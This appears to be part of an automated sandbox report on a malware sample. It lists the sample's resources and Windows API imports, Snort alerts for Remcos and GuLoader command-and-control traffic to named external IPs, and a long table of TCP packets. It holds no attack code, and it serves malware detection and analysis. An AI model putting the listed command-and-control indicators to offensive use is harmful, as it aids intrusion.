                                                                                                                                                                                                                    RT_BITMAP0x4f4600x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                                                                                                                    RT_ICON0x4f7c80x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.023585673284611062
                                                                                                                                                                                                                    RT_ICON0x917f00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.04118360345439489
                                                                                                                                                                                                                    RT_ICON0xa20180x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.07894426074633916
                                                                                                                                                                                                                    RT_ICON0xa62400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.10300829875518672
                                                                                                                                                                                                                    RT_ICON0xa87e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.1425891181988743
                                                                                                                                                                                                                    RT_ICON0xa98900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.27158848614072495
                                                                                                                                                                                                                    RT_ICON0xaa7380x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.17418032786885246
                                                                                                                                                                                                                    RT_ICON0xab0c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.29196750902527074
                                                                                                                                                                                                                    RT_ICON0xab9680x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.2254335260115607
                                                                                                                                                                                                                    RT_ICON0xabed00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.24379432624113476
                                                                                                                                                                                                                    RT_DIALOG0xac3380x144dataEnglishUnited States0.5216049382716049
                                                                                                                                                                                                                    RT_DIALOG0xac4800x13cdataEnglishUnited States0.5506329113924051
                                                                                                                                                                                                                    RT_DIALOG0xac5c00x120dataEnglishUnited States0.5173611111111112
                                                                                                                                                                                                                    RT_DIALOG0xac6e00x11cdataEnglishUnited States0.6091549295774648
                                                                                                                                                                                                                    RT_DIALOG0xac8000xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                                                                                    RT_DIALOG0xac8c80x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                    RT_GROUP_ICON0xac9280x92dataEnglishUnited States0.6506849315068494
                                                                                                                                                                                                                    RT_VERSION0xac9c00x25cdataEnglishUnited States0.5149006622516556
                                                                                                                                                                                                                    RT_MANIFEST0xacc200x34eXML 1.0 document, ASCII text, with very long lines (846), with no line terminatorsEnglishUnited States0.5141843971631206

                                                                                                                                                                                                                    Imports

                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                    KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                                                                                                    USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                                                                                                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                                                                                    SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                                                                                                                                    ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                                                                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                                                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                                                                                                                    Possible Origin

                                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                    EnglishUnited States

                                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                                    Snort IDS Alerts

                                                                                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                    192.168.11.2094.156.6.2535007724022032776 10/31/23-13:20:00.651244TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin500772402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    94.156.6.253192.168.11.202402500772032777 10/31/23-13:26:11.604235TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response24025007794.156.6.253192.168.11.20
                                                                                                                                                                                                                    192.168.11.20217.147.225.6950076802855192 10/31/23-13:19:57.803142TCP2855192ETPRO TROJAN GuLoader Encoded Binary Request M25007680192.168.11.20217.147.225.69

                                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                    Oct 31, 2023 13:19:57.497976065 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:57.801594973 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:57.801970959 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:57.803142071 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.106368065 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.107784033 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.107846022 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.107963085 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.107980013 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.108010054 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.108088017 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.108217955 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.108251095 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.108294010 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.108309031 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.108365059 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.108469963 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.108553886 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.108647108 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.108712912 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.108767986 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.108915091 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.108972073 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.411365986 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.411387920 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.411405087 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.411420107 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.411516905 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.411559105 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.411564112 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.411659002 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.411700010 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.411717892 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.411860943 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.411863089 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.411884069 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.411900043 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.411945105 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.411981106 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412048101 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412134886 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412157059 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412173033 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412210941 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412228107 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412378073 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412378073 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412461042 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412482977 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412499905 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412583113 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412583113 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412628889 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412646055 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.412787914 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.715475082 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.715574980 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.715647936 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.715727091 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.715766907 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.715768099 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.715801954 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.715876102 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.715924025 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.715949059 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.715981960 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716053009 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716063023 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716150999 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716149092 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716223001 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716296911 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716306925 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716368914 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716375113 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716439962 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716444016 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716496944 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716511011 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716581106 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716651917 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716650963 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716722012 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716737986 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716737986 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716793060 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716821909 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716864109 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.716938972 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717009068 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717031002 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717031002 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717081070 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717130899 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717154026 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717180967 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717225075 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717247009 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717295885 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717355013 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717392921 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717410088 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717535973 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717528105 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717587948 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717655897 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717744112 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717755079 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717818975 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717828989 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717901945 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717921019 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717972040 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.717986107 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718044043 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718113899 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718128920 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718183994 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718219995 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718255997 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718270063 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718327999 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718349934 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718410015 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718417883 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718478918 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718483925 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718545914 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718595982 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718645096 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:58.718753099 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.021984100 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.022200108 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.022814035 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023062944 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023330927 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023416042 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023479939 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023545980 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023570061 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023570061 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023612976 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023677111 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023739100 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023751020 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023751020 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023799896 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023842096 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023863077 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023926020 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.023963928 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.024043083 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.024043083 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.024115086 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.024167061 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.024233103 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.024295092 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.024354935 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.024395943 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.024396896 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.024415970 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.024472952 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.024528980 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.024544001 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.024574995 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.024610043 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.024672031 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.024733067 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.024744034 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.024821043 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.024851084 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.024873018 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.025010109 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.025130987 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.025194883 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.025259018 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.025283098 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.025363922 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.025374889 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.025415897 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.025438070 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.025499105 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.025561094 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.025619030 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.025697947 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.025698900 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.025717020 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.025779963 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.025842905 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.025903940 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.025922060 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.025922060 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026010990 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026017904 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026062012 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026082993 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026144981 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026205063 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026218891 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026273966 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026274920 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026319027 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026381969 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026473999 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026479959 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026535988 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026588917 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026629925 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026643038 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026679039 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026695967 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026730061 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026750088 CET8050076217.147.225.69192.168.11.20
